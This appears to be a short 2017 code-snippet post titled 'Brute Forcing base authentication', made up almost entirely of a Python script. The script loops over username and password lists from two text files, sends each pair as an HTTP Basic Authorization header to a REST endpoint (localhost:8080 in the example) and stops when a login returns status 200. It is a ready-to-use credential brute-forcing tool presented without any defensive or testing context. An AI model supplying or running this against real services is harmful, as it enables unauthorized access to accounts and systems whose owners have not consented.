Brute Forcing base authentication
2017-06-16 22:32:18
# python 3.4
import base64
import urllib.request
import urllib.parse
login_file_path = "login.txt"
pass_file_path = "pass.txt"
def to_basic(text):
text = text.encode('ascii')
return base64.b64encode(text).decode("utf-8")
def user_pass_to_basic(user_login, user_password):
return to_basic(user_login + ":" + user_password)
def do(user_login, user_password):
basic = user_pass_to_basic(user_login, user_password)
_headers = {
'Authorization': 'Basic ' + basic
}
req = urllib.request.Request(
'http://localhost:8080/rest/api/users',
headers=_headers,
method='GET'
)
try:
response = urllib.request.urlopen(req)
print(user_login + ":" + user_password + "=" + str(response.getcode()))
if response.getcode() == 200:
return True
else:
return False
except urllib.error.HTTPError as e:
print(user_login + ":" + user_password + "=" + str(e.getcode()))
return False
success = False
with open(login_file_path) as loginFile:
for _login in loginFile:
if success: break
with open(pass_file_path) as passFile:
for _pass in passFile:
if success: break
_login = _login.strip()
_pass = _pass.strip()
success = do(_login, _pass)